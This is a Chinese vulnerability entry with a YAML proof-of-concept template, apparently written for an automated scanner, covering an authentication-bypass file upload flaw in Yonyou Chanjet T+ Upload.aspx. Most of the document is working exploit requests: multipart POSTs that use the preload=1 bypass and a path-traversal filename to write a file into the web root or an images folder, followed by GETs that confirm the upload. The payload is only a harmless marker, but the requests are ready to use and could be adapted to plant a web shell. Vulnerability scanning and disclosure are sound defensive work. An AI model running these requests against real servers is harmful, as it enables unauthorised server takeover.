漏洞描述
用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器
app="畅捷通-TPlus"
yonyou-chanjet-tplus-file-upload: 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
PoC代码[已公开]
id: yonyou-chanjet-tplus-file-upload
info:
name: 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |
用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器
app="畅捷通-TPlus"
reference:
- http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
set:
r1: randomLowercase(8)
md5str: md5(r1)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"File1\"; filename=\"../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/{{r1}}.txt\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{md5str}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /tplus/{{r1}}.txt?preload=1
expression: response.body.bcontains(bytes(md5str))
r2:
request:
method: POST
path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"File1\"; filename=\"{{r1}}.txt\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{md5str}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r3:
request:
method: GET
path: /tplus/SM/SetupAccount/images/{{r1}}.txt?preload=1
expression: response.body.bcontains(bytes(md5str))
expression: (r0() && r1()) || (r2() && r3())